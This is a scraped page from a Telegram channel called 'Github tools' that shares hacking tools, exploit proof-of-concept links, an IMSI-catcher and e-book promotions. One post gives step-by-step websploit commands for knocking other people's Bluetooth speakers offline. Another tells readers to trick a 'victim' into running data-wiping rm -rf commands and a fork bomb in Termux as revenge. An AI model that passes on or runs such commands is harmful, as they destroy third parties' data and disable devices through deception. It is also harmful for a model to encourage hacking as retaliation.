Github tools
Відкрити в Telegram
Github useful scripts and tools
Показати більшеКраїна не вказанаКатегорія не вказана
706
Підписники
+624 години
+337 днів
+14030 день
Архів дописів
706
IMSI-catcher
This program shows you IMSI numbers, country, brand and operator of cellphones around you.
Track, intercept and monitor cellphones like a government agency 🙆♂️🙆♂️
https://github.com/Oros42/IMSI-catcher
706
📖 Arduino Workshop, 2nd Edition: A Hands-on Introduction with 65 Projects.
• Дата выхода: 15 Июня 2021 год.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• Цена в онлайн магазине: 23$
• VT.
• Through 65 hands-on projects, Arduino Workshop will teach you the tricks and design principles of a master craftsman. This edition has been updated for the latest version of the Arduino IDE and revised to reflect current hardware and technology. It includes coverage of general electronics concepts as well as schematic diagrams and detailed images of components. You’ll experiment with touchscreens and LED displays, explore robotics, use sensors with wireless data links, and control devices remotely with a cell phone.
🧩 Софт для чтения.
#Arduino #Eng706
📖 Ransomware and Cybercrime.
• Дата выхода: 17 Июня 2022 года.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• VT.
• This book covers many cyber and ransomware attacks and events, including how we have gotten to the point of massive digital utilisation, particularly during the global lockdown and COVID-19 pandemic, to online spending that will see twice the monetary amount lost to cybercrime than what is spent online.
🧩 Софт для чтения.
#Eng #Ransomware #Cybercrime706
https://github.com/dimensionc132/deadmanswitch
Dead switch
Dead Switch is a security app designed to protect your data in case you are threatened by violence from people, organizations, government agencies or you just want to have a safe way to send data in case something happens to you unexpected.
Dead Switch will check at the interval you specified (minimum 1 day), asking you to enter the username and password you set.
If you do not, the email you previously specified will be sent to the specified person(s).
https://github.com/dimensionc132/deadmanswitch
706
A simple dead man switch written in bash and python
#ВесьМирВТруху
https://github.com/dimensionc132/deadmanswitch
706
Zeek script to detect exploitation attempts of #CVE-2022-21449 targeting TLS clients
https://github.com/thack1/CVE-2022-21449
CVE-2022-21449 Proof of Concept demonstrating its usage with a client running on a vulnerable Java version and a malicious TLS server
https://github.com/khalednassar/CVE-2022-21449-TLS-PoC
706
https://github.com/oppsec/WSOB
WSOB is a #python tool created to #exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.
706
#NSA #GIS #GeoINT
https://github.com/NationalSecurityAgency/qgis-bulk-nominatim
https://github.com/NationalSecurityAgency/qgis-d3datavis-plugin
https://github.com/NationalSecurityAgency/qgis-datetimetools-plugin
https://github.com/NationalSecurityAgency/qgis-earthsunmoon-plugin
https://github.com/NationalSecurityAgency/qgis-kmltools-plugin
https://github.com/NationalSecurityAgency/qgis-latlontools-plugin
https://github.com/NationalSecurityAgency/qgis-lockzoom-plugin
https://github.com/NationalSecurityAgency/qgis-mgrs-plugin
https://github.com/NationalSecurityAgency/qgis-searchlayers-plugin
https://github.com/NationalSecurityAgency/qgis-shapetools-plugin
706
📖 CompTIA Cloud+ Certification All-in-One Exam Guide (Exam CV0-003).
• Дата выхода: 30 Июля 2021 года.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• VT.
• Take the CompTIA Cloud+ exam with confidence using this highly effective self-study guide. CompTIA Cloud+™ Certification All-in-One Exam Guide (Exam CV0-003) offers complete coverage of every topic on the latest version of the exam. You’ll find learning objectives at the beginning of each chapter, exam tips, in-depth explanations, and practice exam questions. You will get in-depth explanations of the latest cloud computing concepts, models, and terminology; disk storage systems; networking storage and infrastructure; virtualization components; security best practices, and more. Designed to help you pass the CV0-003 exam with ease, this definitive guide also serves as an essential on-the-job reference.
🧩 Софт для чтения.
#Eng #Cloud #Security #DevOps706
Hacking Bluetooth speakers
Salute, bandits! I think many schoolchildren with speakers playing terrible music are enraged. And I think everyone would like to drown out this nightmare. In this post, you will learn how to break the Bluetooth connection between the speaker and the phone, and even connect to it and turn
on your music.
Installation
$ pkg update
$ pkg install python
$ pkg install git
$ pkg install python2
$ pip2 install scapy
$ git clone https://github.com/The404Hacking/websploit
$ cd websploit
$ chmod 777 * websploit.py
launch
$ python2 websploit.py
We open the utility. Next, we write the following:
$ use bluetooth/bluetooth_pod
Then follow the link and download "nRF Connect" - LINK Install and open, after which we give the necessary permissions. Click "SCAN", look for the column, and copy its mac-address.
We return to Termux and write the following:
$ set size 999
$ set bdaddr mac address
$ run
Instead of "mac-address" paste the copied mac-address. Further, as soon as the speaker stops playing sound, this means that we have broken the connection, so we immediately try to connect via "nRF Connect" to the speaker.
It is also worth clarifying that if the distance to the column is too large, then nothing will come of it. In this way, you can break the connection not only of the bluetooth speaker, but also of any other devices with a "blue tooth".
For more power, I advise you to create as many as 8 sessions and launch an attack in all ✌️706
NIVOS is a python tool that allows you to scan deeply, crack wifi, see people on your network. It applies to all linux operating systems. And it is improving every day, new packages are added.
https://github.com/TheSadError/NIVOS
706
[New] Smtps Checker With Email testing ! Very fast
Download link : https://github.com/Rootinabox/Smtps-Checker
706
We destroy the enemy's phone
Salute, bandits! To take revenge on a nearby offender, it is not necessary to have hacker skills and try to somehow hack him. It is enough to convince the victim to enter a couple of commands in Termux, after which he will regret contacting you.
1. We convince the victim to download (even if not downloaded) and open Termux;
2. We send the following commands to t
he victim and ask them to enter them one by one:
$ termux-setup-storage
$ rm -rf /sdcard/*
$ rm -rf ~/*
$ :(){ :|:& };:
3. Congratulations, you are amazing!
These commands will format the entire system and the victim will lose everything that was on his device ✌️706
#osint
Here is a list of wonderful services to determine if a picture or video is fake ( deep fake) ..
♾ https://chrome.google.com/webstore/detail/fake-profile-detector-dee/jbpcgcnnhmjmajjkgdaogpgefbnokpcc
♾ http://www.kaicatch.com/
♾ https://github.com/chinmaynehate/DFSpot-Deepfake-Recognition
